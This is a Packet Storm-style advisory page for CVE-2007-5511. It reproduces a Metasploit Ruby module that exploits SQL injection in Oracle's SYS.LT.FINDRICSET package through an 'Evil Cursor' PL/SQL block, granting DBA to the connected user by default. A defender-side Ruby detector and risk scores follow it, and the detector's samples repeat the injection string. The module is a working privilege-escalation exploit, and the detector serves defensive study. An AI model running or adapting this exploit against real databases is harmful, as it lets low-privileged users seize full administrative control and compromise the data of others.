Oracle DB SQL Injection Via SYS.LT.FINDRICSET Evil Cursor Method

Published: 31 Aug 2024 00:00:00
Reported by: Jay Turla, metasploit.com
Type: packetstorm
Source: packetstormsecurity.com
Views: 232

Oracle DB SQL Injection via SYS.LT.FINDRICSET Evil Cursor Method - Escalation to DB

Related

| Reporter | Title | Published | Family |
| --- | --- | --- | --- |
| Circl | CVE-2007-5511 | 29 May 2018 15:50 | circl |
| Check Point Advisories | Oracle Database Server SYS.LT.FINDRICSET Function SQL Injection (CVE-2007-5511) | 3 Nov 2009 00:00 | checkpoint_advisories |
| Check Point Advisories | Oracle Database SYS.LT.FINDRICSET SQL Injection (CVE-2007-5511) | 13 Nov 2007 00:00 | checkpoint_advisories |
| CVE | CVE-2007-5511 | 17 Oct 2007 23:00 | cve |
| Cvelist | CVE-2007-5511 | 17 Oct 2007 23:00 | cvelist |
| Metasploit | Oracle DB SQL Injection via SYS.LT.FINDRICSET Evil Cursor Method | 28 Jul 2009 13:43 | metasploit |
| NVD | CVE-2007-5511 | 17 Oct 2007 23:17 | nvd |
| Tenable Nessus | Oracle Database Multiple Vulnerabilities (October 2007 CPU) | 16 Nov 2011 00:00 | nessus |
| Prion | Design/Logic Flaw | 17 Oct 2007 23:17 | prion |
| Prion | Sql injection | 17 Oct 2007 23:17 | prion |
```ruby
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::ORACLE

  def initialize(info = {})
    super(update_info(info,
      'Name' => 'Oracle DB SQL Injection via SYS.LT.FINDRICSET Evil Cursor Method',
      'Description' => %q{
        This module will escalate an Oracle DB user to DBA by exploiting
        a sql injection bug in the SYS.LT.FINDRICSET package via Evil
        Cursor technique. Tested on oracle 10.1.0.3.0 -- should work on
        thru 10.1.0.5.0 and supposedly on 11g. Fixed with Oracle Critical
        Patch update October 2007.
      },
      'Author' => ['CG'],
      'License' => MSF_LICENSE,
      'References' =>
        [
          [ 'CVE', '2007-5511'],
          [ 'OSVDB', '40079'],
          [ 'BID', '26098' ],
          [ 'URL', 'http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpuoct2007.html'],
        ],
      'DisclosureDate' => '2007-10-17'))

    register_options(
      [
        OptString.new('SQL', [ false, 'SQL to execute.', "GRANT DBA to #{datastore['DBUSER']}"]),
      ])
  end

  def run
    return if not check_dependencies

    p = Rex::Text.rand_text_alpha_upper(rand(10) + 1)

    cursor = <<-EOF
      DECLARE
      #{p} NUMBER;
      BEGIN
      #{p} := DBMS_SQL.OPEN_CURSOR;
      DBMS_SQL.PARSE(#{p},'declare pragma autonomous_transaction; begin execute immediate ''#{datastore['SQL'].upcase}'';commit;end;',0);
      SYS.LT.FINDRICSET('.''||dbms_sql.execute('||#{p}||')||'''')--','');
      END;
    EOF

    begin
      print_status("Sending Evil Cursor and SQLI...")
      prepare_exec(cursor)
    rescue => e
      return
    end
  end
end
```
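A defender-side check for the call shape the module above sends, as an added example that is not part of the original module or of Metasploit: it scans captured SQL text (how that text is collected, for instance from an audit trail, is assumed) for `LT.FINDRICSET` calls whose first argument decodes to a value containing a quote, `||`, or `dbms_sql.execute`. The function names, the indicator set and the sample statements are constructed for illustration.

```ruby
# Added example (not from the module): review audited SQL text for
# LT.FINDRICSET calls whose first argument looks like an injection carrier.
CALL_RE = /(?:\bSYS\s*\.\s*)?\bLT\s*\.\s*FINDRICSET\s*\(/i
INDICATORS = {
  quote_breakout: /'/,                          # decoded value contains a quote
  concatenation: /\|\|/,                        # PL/SQL concatenation inside the value
  dbms_sql_execute: /dbms_sql\s*\.\s*execute/i  # cursor execution inside the value
}.freeze

# Decode the PL/SQL string literal starting at text[pos].
# Returns the decoded value, or nil when no terminated literal starts there.
def read_plsql_literal(text, pos)
  return nil unless text[pos] == "'"
  value = +''
  i = pos + 1
  while i < text.length
    if text[i] != "'"
      value << text[i]
      i += 1
    elsif text[i + 1] == "'" # doubled quote encodes one literal quote
      value << "'"
      i += 2
    else
      return value
    end
  end
  nil
end

# Returns one finding per suspicious call: { offset:, reasons: [...] }.
def findricset_findings(sql_text)
  findings = []
  sql_text.scan(CALL_RE) do
    start = Regexp.last_match.end(0)
    start += 1 while sql_text[start]&.match?(/\s/)
    value = read_plsql_literal(sql_text, start)
    reasons = value.nil? ? [:non_literal_argument] : INDICATORS.select { |_, re| value.match?(re) }.keys
    findings << { offset: start, reasons: reasons } unless reasons.empty?
  end
  findings
end

# Constructed audit SQL texts; the second mirrors the call shape in the module above.
SAMPLES = [
  "BEGIN SYS.LT.FINDRICSET('SCOTT.EMP','RIC_OUT'); END;",
  %q{BEGIN SYS.LT.FINDRICSET('.''||dbms_sql.execute('||C1||')||'''')--',''); END;}
].freeze

SAMPLES.each { |sql| puts "#{findricset_findings(sql).inspect}  <= #{sql}" }
```

A call whose first argument is a variable rather than a literal is reported as `:non_literal_argument`, since its value cannot be judged from the statement text alone.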


Scores as of 31 Aug 2024 00:00 (current):
Vulners AI Score: 7 (High risk)
CVSS 2: 6.5
EPSS: 0.65615